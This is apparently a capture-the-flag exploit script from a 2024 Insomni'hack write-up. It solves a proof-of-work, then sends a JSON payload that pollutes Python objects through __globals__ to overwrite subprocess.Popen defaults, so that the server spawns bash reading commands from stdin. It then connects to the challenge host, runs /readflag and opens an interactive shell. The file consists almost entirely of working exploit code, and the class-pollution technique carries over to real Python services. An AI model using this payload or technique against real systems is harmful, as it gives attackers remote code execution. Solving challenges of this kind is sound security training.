writeups/2024/inso/ppp-exploit.py

from pwn import *
import socket

import json

import ppp
import secrets
import tqdm

popen_defaults = [-1, "/bin/bash", None, None, None, None, True, False,
                  None, {"BASH_ENV":"/proc/self/fd/0"}, None, None, 0, True, False, []]

for _ in tqdm.trange(50000000):
    nonce = ppp.generate_nonce()
    data = secrets.token_hex(16)
    if ppp.is_valid_proof(data, nonce):
        break
else:
    raise Exception("oops")

hash = hashlib.sha256(f'{data}{nonce}'.encode()).hexdigest()

obj = {
    "data": data,
    "nonce": nonce,
    "hash": hash,
    "get_data": {
        "__func__": {
            "__globals__": {
                "subprocess": {
                    "Popen": {
                        "__init__": {
                            "__defaults__": popen_defaults
                        }
                    }
                }
            }
        }
    }
}

payload = json.dumps(obj)

print("running")

r = remote("ppp.insomnihack.ch", 12345)
r.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

print(r.recvline())
r.sendline(payload)
r.sendline("/readflag Please")
r.shutdown('send')
r.interactive()